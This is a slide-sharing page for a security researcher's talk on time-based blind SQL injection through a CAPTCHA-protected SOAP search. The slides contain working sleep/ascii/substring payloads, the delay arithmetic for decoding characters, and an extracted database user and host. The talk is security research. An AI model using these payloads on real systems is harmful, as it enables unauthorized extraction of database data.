Frans Rosén, profile picture
Uploaded byFrans Rosén
PDF, PPTX3,927 views

Time based CAPTCHA protected SQL injection through SOAP-webservice

Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.

Download as PDF, PPTX
detectify Time based captcha protected SQL injection through SOAP-webservice Frans Rosén @fransrosen
detectify Search + CAPTCHA
detectify Search for Bobby: '
detectify Search: '-sleep(5)-'
detectify CAPTCHA… https://twitter.com/offensive_image/status/751191306500734976
detectify Me need 1. Do a clear PoC – get data 2. As few requests as possible 3. Find ALL the store fronts! 4. ??? 5. PROFIT!!!
detectify user() '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'
detectify user() '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-' (14*2) + 90 = 118 == v
detectify Validate '-(if(ascii(substring(user(), 1, 1)) = 117, sleep(3),1))- (if(ascii(substring(user(), 1, 1)) = 118, sleep(6),1))- (if(ascii(substring(user(), 1, 1)) = 119, sleep(9),1))-' === v
detectify Down on the @ '-sleep((ascii(substring(user(), 21, 1)) - 90) / 2)-'
detectify Host search '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
detectify Host search 0s for a dot (T - 4) / 2 = 2 '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
detectify Setup
detectify Result rawskuiumsal@192.251.68.254
detectify Result
detectify Other https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf SQL Injection Optimization and Obfuscation Techniques
detectify Thanks! Frans Rosén (@fransrosen) – www.detectify.com

More Related Content

PDF
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
byFrans Rosén
 
PDF
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
PDF
Offzone | Another waf bypass
byДмитрий Бумов
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
byFrans Rosén
 
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
Offzone | Another waf bypass
byДмитрий Бумов
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
Attacking thru HTTP Host header
bySergey Belov
 
Waf bypassing Techniques
byAvinash Thapa
 

What's hot

PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PDF
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
byFrans Rosén
 
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
PDF
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PDF
Http Parameter Pollution, a new category of web attacks
byStefano Di Paola
 
PDF
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
PDF
DNS hijacking using cloud providers – No verification needed
byFrans Rosén
 
PPTX
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
PDF
Api security-testing
byn|u - The Open Security Community
 
PPT
Cache poisoning
byAlexandraLacatus
 
PDF
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
PPTX
Web Cache Poisoning
byKuldeepPandya5
 
PDF
XSS Magic tricks
byGarethHeyes
 
PDF
OAuth
byIván Fernández Perea
 
PPTX
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
PPTX
Deep dive into ssrf
byn|u - The Open Security Community
 
PDF
Secure Session Management
byGuidePoint Security, LLC
 
PDF
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
byAbhinav Mishra
 
PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
byFrans Rosén
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
Http Parameter Pollution, a new category of web attacks
byStefano Di Paola
 
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
DNS hijacking using cloud providers – No verification needed
byFrans Rosén
 
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
Api security-testing
byn|u - The Open Security Community
 
Cache poisoning
byAlexandraLacatus
 
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
Web Cache Poisoning
byKuldeepPandya5
 
XSS Magic tricks
byGarethHeyes
 
OAuth
byIván Fernández Perea
 
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
Deep dive into ssrf
byn|u - The Open Security Community
 
Secure Session Management
byGuidePoint Security, LLC
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
byAbhinav Mishra
 
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 

Recently uploaded

PPTX
Cloud Metrics: The Cost-Value Equation (All Things Open 2025)
byEric D. Schabell
 
PDF
Tilannekatsaus tekoälytoimintaan Suomessa.pdf
byMindtrek
 
PDF
2025 October Patch Tuesday
byIvanti
 
PDF
Session 3 - Specialized AI Associate Series: AI Powered Automation through sp...
byDianaGray10
 
PDF
From Infrastructure to Insight: Technical Pathways to Value in Europe’s Compu...
byMindtrek
 
PPTX
⚡Level Up Your Slack Game: Workflows & Conditional Branching🎉
bySanjeetMishra29
 
PDF
Ethical Initiatives in AI and accountability.pdf
byShiwani Gupta
 
PDF
Dream Companion Reviews, Pricing, & Alternatives
byDream Companion
 
PPTX
Building Europe with Open LLMs - Manu Setälä.pptx
byMindtrek
 
PDF
From Bots to Brains: Getting Started with Agentic Automation in UiPath
byUiPathCommunity
 
PPTX
This Could Have Been a Slack Message: Diagnosing and Treating Bad Meetings
byMike Clement
 
PDF
Optimizing a Global Training Strategy: An LKQ Corporation Case Study
byRustici Software
 
PDF
NeuroXR: Current Research and Opportunities
byMark Billinghurst
 
PPTX
Behind the Scenes at Netflix: Distributed Systems & NoSQL Architecture.
byayesha butalia
 
PDF
A SEA of Energy Efficiency Opportunities!
byMemoori
 
PPTX
CLOUD STUDY JAM 2025 GOOGLE DEVELOPER GROUPS ON CAMPUS NSEC
byasutoshkumar560
 
PDF
What's New? ThousandEyes Features and Highlights: October 2025
byThousandEyes
 
PDF
Fairness and Bias in AI Ethics and Explainability
byShiwani Gupta
 
PDF
AGV PROTOCOL BRAND KIT COMPLETE VIEW.pdf
byfagbolade
 
PDF
Meta and Apple close to settling EU cases.pdf
byLUMINATIVE MEDIA/PROJECT COUNSEL MEDIA GROUP
 
Cloud Metrics: The Cost-Value Equation (All Things Open 2025)
byEric D. Schabell
 
Tilannekatsaus tekoälytoimintaan Suomessa.pdf
byMindtrek
 
2025 October Patch Tuesday
byIvanti
 
Session 3 - Specialized AI Associate Series: AI Powered Automation through sp...
byDianaGray10
 
From Infrastructure to Insight: Technical Pathways to Value in Europe’s Compu...
byMindtrek
 
⚡Level Up Your Slack Game: Workflows & Conditional Branching🎉
bySanjeetMishra29
 
Ethical Initiatives in AI and accountability.pdf
byShiwani Gupta
 
Dream Companion Reviews, Pricing, & Alternatives
byDream Companion
 
Building Europe with Open LLMs - Manu Setälä.pptx
byMindtrek
 
From Bots to Brains: Getting Started with Agentic Automation in UiPath
byUiPathCommunity
 
This Could Have Been a Slack Message: Diagnosing and Treating Bad Meetings
byMike Clement
 
Optimizing a Global Training Strategy: An LKQ Corporation Case Study
byRustici Software
 
NeuroXR: Current Research and Opportunities
byMark Billinghurst
 
Behind the Scenes at Netflix: Distributed Systems & NoSQL Architecture.
byayesha butalia
 
A SEA of Energy Efficiency Opportunities!
byMemoori
 
CLOUD STUDY JAM 2025 GOOGLE DEVELOPER GROUPS ON CAMPUS NSEC
byasutoshkumar560
 
What's New? ThousandEyes Features and Highlights: October 2025
byThousandEyes
 
Fairness and Bias in AI Ethics and Explainability
byShiwani Gupta
 
AGV PROTOCOL BRAND KIT COMPLETE VIEW.pdf
byfagbolade
 
Meta and Apple close to settling EU cases.pdf
byLUMINATIVE MEDIA/PROJECT COUNSEL MEDIA GROUP
 
In this document
Powered by AI

Presentation by Frans Rosén on Detectify, focusing on time-based CAPTCHA protection and SQL injection via SOAP web services.

Discusses search functionality with CAPTCHA integration, showing examples of SQL injection payloads used to bypass security.

Explains a systematic approach to SQL injection, aiming to retrieve user data with specific queries and time delays.

Details methods for targeting specific user data, including calculations related to ASCII values for extracting information.

Brief mention of setup required for executing the SQL injections, with example results showcasing successful data retrieval.

References additional resources on SQL injection optimization and obfuscation techniques for deeper understanding.

Thank you note from Frans Rosén, providing contact information and promoting the Detectify platform.

Time based CAPTCHA protected SQL injection through SOAP-webservice